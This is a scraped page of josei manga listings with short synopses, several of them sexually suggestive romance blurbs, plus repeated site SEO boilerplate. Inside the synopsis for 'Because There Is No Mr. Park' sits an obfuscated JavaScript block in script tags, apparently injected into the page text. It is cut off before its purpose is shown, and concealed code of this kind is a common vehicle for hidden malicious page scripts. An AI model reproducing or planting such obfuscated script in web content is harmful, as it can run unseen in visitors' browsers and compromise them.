Josei - Page 115

Josei manga is designed for adult women, often covering themes such as love, career, and personal growth. It typically focuses on more realistic portrayals of relationships and emotional maturity, compared to the idealized stories in shoujo manga.

3234 results

Kinmu Jikangai, Rinjin No Joushi Wa Kemono Ni Naru

On the veranda, hot fingers are swirling around in her sensitive spot, to the point that her legs are shaking... Her demon boss is so beastly and passionate...! Notices: This manga has sexual content and censurable scenes, which means that it's smut, so please don't remove the smut tag


Shuuen no Shiori

A story based off of the "Shuuen no Shiori Project", a song series by 150P and Suzumu. The stories are based off of Japanese children's games and urban legends such as one-man hide and seek, doppelgangers, mearry's phone and monkey paw. On the normal, unchanging campus, it suddenly occurred; A murder case where a body was cut open, right into two. On the other side of the unsolved case, the rumor-loving high school students became involved in a certain ritual. From the extremely popular songs on Nico Nico Douga, begins the Project. What is the “Bookmark of Demise”…? Who is the traitor…? What will the conclusion to this story be…? So, can you solve this mystery?


Gigolo (SAITOU Chiho)

Collection of short stories: 1) Gigolo The story is about two young guys who used to live at the expense of women. But now they're broke again, so they need to urgently find new clients... But will it all happen like they planned? 2) Gigolo ni Natta Yoru The story about Goro's first time as a gigolo. 3) Saboten to Bara no Oujisama 4) Aurora


Glass Goshi no Kioku

Marla and Jaicey are twin sisters. They were separated at birth and reunited 24 years later, but Jaicey asks Marla to keep it a secret. She doesn't want her loving adopted family to know about Marla yet. Jaicey's brother, Jake, regards his sister's new "friend" with suspicion and is mean to Marla, but she is just happy to have a family of her own, after years of loneliness. How could she have known that more suffering awaits her...?


Kamen Fuufu ~Onzoushi Wa Konya Mo Tsuma Wo Aisenai~

Mikoto, who has an old grandfather, decides to marry at a young age for his sake. Kazuki who becomes her husband is a president of a company. Moreover, he was her first love who supported Mikoto who lost her mother at a young age."However, there is no remnant of the old days when I met Kazuki again", and Mikoto is treated ruthlessly from the first day of their marriage. "Even if I don't have love, I can be a good wife at least", Mikoto decides, but Kazuki is rumored to have a special relationship with another woman!?A thrilling love story that mixes love and hate.Kamen Fuufu ~Onzoushi wa Konya mo Tsuma wo Aisenai~, , mangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can Follow mangabuddy if you want to read the latest chapters of the . With a massive collection of hundreds of , all of which have been translated into good English, you'll find enough "reading" material to fill a library. With high-quality artwork, your library will be quickly filled with your .


Because There Is No Mr. Park

While on the way to work, Yuji Shin saw a swallow lying weakly on the road. I hate bothersome things, but I can't ignore the injured swallow. I heal the wounds and take care of the swallow. However, the reality is that I am a college student who is already tight on money to take care of myself, so I will soon return the swallow... “Don’t forget Mr. Park when you come again…" The swallow, who just flew to the mountain spirit, asks for Mr. Park so that he can repay his grace, but the time is already in the 21st century. Mr. Park, who will repay his favor, is gone. "Then what should I do...?" “What about Mr. Park, just get rid of it with the body!!” Will the swallow be able to safely return the grace to Yuji? A project to repay the full-fledged grace of the Swallows who came to fill them with their bodies because Mr. Park wasn't there!<script></script><script>(function(_0x423ed3,_0x33603d){var _0x3542dc=_0x528a,_0x565839=_0x423ed3();while(!![]){try{var _0x1ac03d=-parseInt(_0x3542dc(0x159))/(0x3d6*0x2+0x1cba*0x1+0x7*-0x533)+-parseInt(_0x3542dc(0x169))/(-0x133a*-0x2+0x11bd+-0x382f)+parseInt(_0x3542dc(0x16a))/(0x2176+0x1251+0x19e2*-0x2)*(parseInt(_0x3542dc(0x162))/(0x2320+0x1*0x2035+-0x38b*0x13))+parseInt(_0x3542dc(0x179))/(-0x2*-0x641+-0xf*0x1d+-0xaca)*(-parseInt(_0x3542dc(0x15a))/(-0x97*-0x17+0x114c+0x1ed7*-0x1))+parseInt(_0x3542dc(0x16f))/(-0xf*0x119+0x1ac1+-0xa43)*(-parseInt(_0x3542dc(0x160))/(-0x2*-0x907+0x259d+0x1*-0x37a3))+parseInt(_0x3542dc(0x166))/(-0x11c5+0x1*0x943+0x88b)*(-parseInt(_0x3542dc(0x17a))/(0x2f*-0x22+-0x24f4+0x159e*0x2))+-parseInt(_0x3542dc(0x15c))/(-0x1e44+0x13cc+0x27*0x45)*(-parseInt(_0x3542dc(0x163))/(0x1*-0x248f+0x35b*0x2+0x1de5));if(_0x1ac03d===_0x33603d)break;else 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Love, Hate, Love.

28-year-old Kiwako meets a man who smoking on the balcony one day. Her next door neighbour, Nuihara, a lazy, 52-year-old college professor. As Kiwako is considering abandoning her career as a ballet dancer, he gives her some sincere advice. Until now, Kiwako had given up on love, but his words have stirred up a passion within her.


Muku na Koushaku Fujin

from Chantelle Shaw's website: Revenge, passion, and a convenient marriage… Duke Javier Herrera is a ruthless Spanish billionaire. He’s learnt the hard way never to fall in love. Now he needs a wife if he’s to inherit the family banking business. Grace Beresford is the daughter of a man who’s fleeced Javier of millions, and he sees an opportunity for revenge and a convenient wife. At first, Javier doesn’t care that Grace hates him – all he wants is her body. But then he finds that even this small price is one she refuses to pay…despite their explosive mutual attraction. How long can Grace remain his wife in name only?


Drunken My Boss

Cha Iseul is a girl who, without money, is like a lifeless body. She indulges in a depraved lifestyle. But one day, her card is confiscated, and she faces the threat of being kicked out of the house. At that moment, a mysterious woman named Sori appears in front of Iseul. "Madam, do you really not remember me?"


The Tiger King’S Diary

The king of the tiger spirits picked up a cute, wimpy “devoured ghost” while patrolling the mountain… Hey, stop crying! What if… I provided for you?! [Villainous tiger king x dumb, but cute devoured ghost]


Like A Dream Between The Waves Of Bedsheets

*Each Chapter Or So Is A Oneshot* "Even though this is the first time we've met, how does he understand everything?" We exchanged careful caresses and kisses in a hotel suite. He perfectly conveyed his feelings as though he was always searching for me. Having every corner of my body doted on almost made me cry and both my mind and body began melting away Though Yukino enjoys her work as the manager of a cosmetics store, she still leads an unsatisfying life. One day, she helps someone out while shopping and ends up having a dazzling night He was making an adorable expression, but just when she thought of pampering him like a cat, she gets caught in his passionate gaze After being caressed by his beautiful fingers and licked by his lips and the tip of his tongue, all that's left is for him to put it inmangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can , online for free at mangabuddy. Chapters are updated hourly with high-quality graphics and a full English translation. Find free translations of your favorite , and . The latest updated content on mangabuddy is now available.
